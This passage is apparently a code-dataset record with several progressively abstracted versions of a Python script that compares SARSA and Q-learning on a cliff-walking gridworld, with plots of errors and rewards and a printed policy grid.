must be Q_LEARNING or SARSA or both')\n import sys; sys.exit()\n\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\n\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\n\n\nplt.savefig('all_runs.png')\nplt.show()\n# for i, j in [(0, 3), (1, 4), (2, 5)]:\nfor reward in rewards:\n # plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))\n # plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\n\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, 
next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', 
va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "<import token>\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in 
range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n 
else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in 
range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n 
plt.plot(mistake_q_learning[1])\n        legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n            )\n    plt.grid(which='y')\n    plt.legend(legend)\n    plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n    final_grid = np.array([[max(states[i][j].q_values) for j in range(\n        N_COLUMNS)] for i in range(N_ROWS)])\n    if PLOTS > 2:\n        ax = ax[PLOTS % 3, 1]\n    else:\n        ax = ax[PLOTS, 0]\n    ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n    ax.set_xticks(np.arange(N_COLUMNS))\n    ax.set_yticks(np.arange(N_ROWS))\n    ax.set_xticklabels([i for i in range(N_COLUMNS)])\n    ax.set_yticklabels([i for i in range(N_ROWS)])\n    plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n        'anchor')\n    for i in range(N_ROWS):\n        for j in range(N_COLUMNS):\n            text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n                ), ha='center', va='center', color='w')\n    fig.tight_layout()\n    ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n    for i in range(N_ROWS):\n        str_ = ''\n        for j in range(N_COLUMNS):\n            str_ += str(int(final_grid[i][j])) + ', '\n    PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n    print('{}; ε = {}'.format(method, epsilon))\n    print('-' * 60)\n    for i in range(len(states)):\n        line_str = ''\n        for j in range(len(states[0])):\n            if j == 0:\n                print('|', end='')\n            if states[i][j].is_goal:\n                print(Back.GREEN + '  ', end='')\n                print(Style.RESET_ALL + ' | ', end='')\n            elif states[i][j].is_cliff:\n                print(Back.RED + '  ', end='')\n                print(Style.RESET_ALL + ' | ', end='')\n            else:\n                print(' {} | '.format(q_to_arrow(states[i][j].\n                    get_max_q_index())), end='')\n        print(line_str)\n        print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n    print('invalid method. 
must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\n<assignment token>\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - 
state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n 